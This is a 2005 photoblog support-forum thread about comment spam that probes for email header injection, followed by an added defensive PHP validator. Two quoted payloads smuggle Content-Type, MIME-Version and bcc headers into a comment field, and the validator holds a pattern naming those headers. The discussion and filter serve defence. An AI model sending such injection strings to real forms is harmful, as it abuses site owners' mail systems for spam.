Strange Comment Spam
aswilliamson
08-21-2005, 06:21 PM
I'm getting a strange kind of comment spam where it seems to be spoofing a fake email at my domain. The email notification I get of this comment is:
Hello,
A new comment has been made at your photoblog.
http://www.shadedpixel.net?showimage=pxtkuc@shadedpixel.net
The Comment is:
----------------------------------------------------------------------
pxtkuc@shadedpixel.net
by pxtkuc@shadedpixel.net Content-Type: multipart/mixed; boundary=\\\"===============1616086776==\\\" MIME-Version: 1.0 Subject: ef88fe94 To: pxtkuc@shadedpixel.net bcc: mhkoch321@aol.com From: pxtkuc@shadedpixel.net This is a multi-part message in MIME format. --===============1616086776== Content-Type: text/plain; charset=\\\"us-ascii\\\" MIME-Version: 1.0 Content-Transfer-Encoding: 7bit eihrxtrshz --===============1616086776==-- -
----------------------------------------------------------------------
Email Sent by pixelpost
These comments don't show up anywhere on my site, but I think they're filling my database.
Anyone have any idea what this type of comment is doing, or how to stop it?
Connie
08-21-2005, 09:21 PM
we must put that on our topic list, as I noticed strange things like that one time before and I don't even know what this should be..
we will have an eye on it..
I have seen this in my own photoblog. Essentially, the spammer tests the form in your pixelpost install to see if it will send an email to a different address other than the one you set when installing pixelpost. This is normally done to formmail installations (a CGI script for converting "contact us" forms in websites into an email sent to a nominated address), but the spammer must know of a vulnerability either in PHP or in pixelpost itself or he (it's a he for sure, heh!) is an idiot.
I am not saying that there is a vulnerability in pixelpost, but for pixelpost installs to be targeted there must be an exploit that is known out there for this idiot to go around trying people's comment forms. Essentially, where there is smoke, there is possibly a fire as well.
Here is the one that I got (site address has been changed to mysite.com)
NOTE: That there is the spammer's address which is bergkoch8@aol.com which is a test address to see if your comment form BCCs the message to his address.
http://www.mysite.com/?showimage=hpt@mysite.com
Content-Type: multipart/mixed; boundary="===============1854752306=="
MIME-Version: 1.0
Subject: 91035ff
To: hpt@mysite.com
bcc: bergkoch8@aol.com
From: hpt@mysite.com
This is a multi-part message in MIME format.
--===============1854752306==
Content-Type: text/plain; charset="us-ascii"
MIME-Version: 1.0
Content-Transfer-Encoding: 7bit
xcqwi
--===============1854752306==--
Connie
08-22-2005, 08:00 AM
Thank you for helping us to understand that
we will go into that for sure
Paul Wood
08-23-2005, 12:58 PM
I've started getting these as well, with the same BCC address. Is the mail making it out to this spammer's address? Are they able to use PixelPost's email code to send spam from our sites?
I have tested the same "sploit" (exploit) on my own photoblog (pixelpost 1.4.2) and it did not work. I tried changing the aol email address in the bcc into another email address of mine and it did not generate any email. All I can advise now is just grab a cup of coffee and relax while deleting the said comment.
There is, however, not a guarantee that this exploit will not develop and create a problem in the future, but we cannot fix a problem that does not exist yet. Try to google his email address and you will see that he has done this in many different places to many different types of php-based software.
Connie
08-23-2005, 07:40 PM
well, the script indeed does just send one email to the administrator if he opted for getting email-notification on new comments
it won't do anything else
but this again shows that these stupid idiots try as much as they can to find out leaks etc.
If ever this creativity would generate something positive... that would be good for all of us
but so, it's just negative creativity or energy...
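How a comment handler can refuse the probe quoted earlier in this thread, as an added example that is not part of the thread and not Pixelpost's own code. It assumes hypothetical form fields `name`, `email` and `message`, assumes that `name` and `email` are the ones copied into mail headers, and uses constructed sample data.

```php
<?php
// Added example, not Pixelpost code. Field names and sample data are constructed.

// Header names that the probes quoted in this thread try to smuggle into a field.
const PROBE_MARKERS = '/\b(bcc|cc|content-type|mime-version|content-transfer-encoding)\s*:/i';

// A value bound for a mail header must be one line: no CR, LF or NUL,
// whether raw or percent-encoded (%0d, %0a, %00).
function header_value_is_safe(string $value): bool
{
    return preg_match('/[\r\n\x00]|%0[ad0]/i', $value) === 0;
}

// Return the reasons to reject one submitted comment (empty array = accept).
// $headerBound lists the fields assumed to be copied into mail headers.
function inspect_comment(array $fields, array $headerBound = ['name', 'email']): array
{
    $reasons = [];
    foreach ($headerBound as $key) {
        $value = (string) ($fields[$key] ?? '');
        if (!header_value_is_safe($value)) {
            $reasons[] = "$key: line break in header-bound field";
        }
        if (preg_match(PROBE_MARKERS, $value) === 1) {
            $reasons[] = "$key: mail header name inside field";
        }
    }
    $email = (string) ($fields['email'] ?? '');
    if ($email !== '' && filter_var($email, FILTER_VALIDATE_EMAIL) === false) {
        $reasons[] = 'email: not a single valid address';
    }
    return $reasons;
}

// Constructed sample shaped like the probe in the thread (addresses replaced).
$probe = [
    'name'    => "hpt@example.com\r\nContent-Type: multipart/mixed; boundary=\"x\"\r\n"
               . "MIME-Version: 1.0\r\nbcc: probe@example.net\r\nFrom: hpt@example.com",
    'email'   => 'hpt@example.com',
    'message' => 'xcqwi',
];
// Constructed ordinary comment: line breaks in the body are fine, it is not a header.
$normal = ['name' => 'Anna', 'email' => 'anna@example.com', 'message' => "Nice shot!\nWhere?"];

foreach (['probe' => $probe, 'normal' => $normal] as $label => $comment) {
    $reasons = inspect_comment($comment);
    echo $label, ': ', $reasons ? 'REJECT (' . implode('; ', $reasons) . ')' : 'accept', PHP_EOL;
}
```

Running the check before the comment is stored also keeps these probes out of the database, not only out of the notification mail.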